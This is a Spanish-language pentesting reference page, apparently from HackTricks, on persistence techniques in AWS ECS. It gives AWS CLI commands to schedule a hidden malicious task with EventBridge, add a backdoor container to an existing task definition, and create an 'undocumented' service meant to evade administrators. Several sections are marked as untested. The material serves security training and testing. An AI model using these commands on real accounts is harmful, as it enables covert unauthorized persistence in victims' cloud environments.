# AWS - Persistencia en ECS {{#include ../../../banners/hacktricks-training.md}} ## ECS Para más información, consulta: {{#ref}} ../aws-services/aws-ecs-enum.md {{#endref}} ### Tarea Periódica Oculta de ECS > [!NOTE] > TODO: Test Un atacante puede crear una tarea periódica oculta de ECS utilizando Amazon EventBridge para **programar la ejecución de una tarea maliciosa periódicamente**. Esta tarea puede realizar reconocimiento, exfiltrar datos o mantener persistencia en la cuenta de AWS. ```bash # Create a malicious task definition aws ecs register-task-definition --family "malicious-task" --container-definitions '[ { "name": "malicious-container", "image": "malicious-image:latest", "memory": 256, "cpu": 10, "essential": true } ]' # Create an Amazon EventBridge rule to trigger the task periodically aws events put-rule --name "malicious-ecs-task-rule" --schedule-expression "rate(1 day)" # Add a target to the rule to run the malicious ECS task aws events put-targets --rule "malicious-ecs-task-rule" --targets '[ { "Id": "malicious-ecs-task-target", "Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster", "RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role", "EcsParameters": { "TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task", "TaskCount": 1 } } ]' ``` ### Contenedor de puerta trasera en la definición de tarea ECS existente > [!NOTE] > TODO: Probar Un atacante puede agregar un **contenedor de puerta trasera sigiloso** en una definición de tarea ECS existente que se ejecute junto a contenedores legítimos. El contenedor de puerta trasera puede ser utilizado para persistencia y realizar actividades maliciosas. ```bash # Update the existing task definition to include the backdoor container aws ecs register-task-definition --family "existing-task" --container-definitions '[ { "name": "legitimate-container", "image": "legitimate-image:latest", "memory": 256, "cpu": 10, "essential": true }, { "name": "backdoor-container", "image": "malicious-image:latest", "memory": 256, "cpu": 10, "essential": false } ]' ``` ### Servicio ECS No Documentado > [!NOTE] > TODO: Probar Un atacante puede crear un **servicio ECS no documentado** que ejecute una tarea maliciosa. Al establecer el número deseado de tareas a un mínimo y deshabilitar el registro, se vuelve más difícil para los administradores notar el servicio malicioso. ```bash # Create a malicious task definition aws ecs register-task-definition --family "malicious-task" --container-definitions '[ { "name": "malicious-container", "image": "malicious-image:latest", "memory": 256, "cpu": 10, "essential": true } ]' # Create an undocumented ECS service with the malicious task definition aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster" ``` {{#include ../../../banners/hacktricks-training.md}}